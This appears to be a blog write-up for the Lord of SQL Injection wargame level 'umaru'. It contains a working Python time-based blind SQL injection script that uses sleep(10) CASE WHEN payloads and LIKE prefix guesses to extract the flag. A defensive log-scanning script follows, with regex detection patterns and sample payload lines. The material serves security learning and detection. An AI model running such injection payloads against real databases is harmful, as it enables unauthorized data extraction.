LOS umaru

Wargame/Lord of SQL 2018. 2. 9. 00:09

```python
# Python 2 script (urllib2, print statement)
import urllib2
import time

def request(data):
    # Send one probe and return how long the server took to answer, in seconds.
    start = time.time()
    url = "https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php?flag="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=iaqbaeq8kf93g61qgl0edanf16')
    response = urllib2.urlopen(req).read()
    end = time.time() - start
    return end

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

# Step 1: find the flag length. sleep(10) runs only when the guess is right,
# so a response slower than 9 seconds means the condition was true.
# The trailing (select 1 union select 2) is a scalar subquery that returns
# two rows, so the statement fails at execution time.
for i in range(0,50):
    payload = "1 and case when length(flag)="+str(i)+" then sleep(10) else 0 end or (select 1 union select 2)"
    if request(payload)>9:
        length = i
        break

print "[*]Admin Password Length = " + str(length)

# Step 2: recover the flag one character at a time with a LIKE prefix match,
# using the same timing signal.
for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "1 and case when flag like '"+admin_pw+strings[i]+"%' then sleep(10) else 0 end or (select 1 union select 2)"
        if request(payload)>9:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw
```
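
A defender's view of the traffic this script produces, as an added example that is not from the original post: it scans access-log lines for parameters that combine a conditional with a delay function and counts how many of those requests took about as long as the injected delay. It is written for Python 3; the log format, the `/item.php` path and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: client, request line, response time in seconds.
SAMPLE_LOG = """\
203.0.113.7 "GET /item.php?flag=1%20and%20case%20when%20length%28flag%29%3D15%20then%20sleep%2810%29%20else%200%20end HTTP/1.1" 0.04
203.0.113.7 "GET /item.php?flag=1%20and%20case%20when%20length%28flag%29%3D16%20then%20sleep%2810%29%20else%200%20end HTTP/1.1" 10.05
203.0.113.7 "GET /item.php?flag=1%20and%20case%20when%20flag%20like%20%27a%25%27%20then%20sleep%2810%29%20else%200%20end HTTP/1.1" 0.03
198.51.100.2 "GET /item.php?flag=how+to+sleep+better HTTP/1.1" 0.02
198.51.100.9 "GET /report.php?id=7 HTTP/1.1" 11.40
"""

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" ([\d.]+)$')
# A delay primitive called as a function, gated by a conditional expression.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.I)
COND_RE = re.compile(r'\bcase\s+when\b|\bif\s*\(', re.I)

def parse(line):
    """Split one log line into (client, decoded parameter values, seconds)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, target, secs = m.groups()
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    query = urlsplit(target).query
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    return client, values, float(secs)

def find_timing_probes(log_text, slow_secs=9.0):
    """Return {client: {"probes": n, "slow_probes": n}} for clients whose
    parameters pair a conditional with a delay function."""
    stats = defaultdict(lambda: {"probes": 0, "slow_probes": 0})
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        client, values, secs = rec
        if any(DELAY_RE.search(v) and COND_RE.search(v) for v in values):
            stats[client]["probes"] += 1
            # Slow answers to such requests mean the condition evaluated true.
            if secs >= slow_secs:
                stats[client]["slow_probes"] += 1
    return dict(stats)

if __name__ == "__main__":
    print(find_timing_probes(SAMPLE_LOG))
```

A client with many probes and a few slow ones is the pattern to alert on; a slow request without the payload pattern, or the word "sleep" in ordinary text, is not counted.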

 


JeonYoungSin
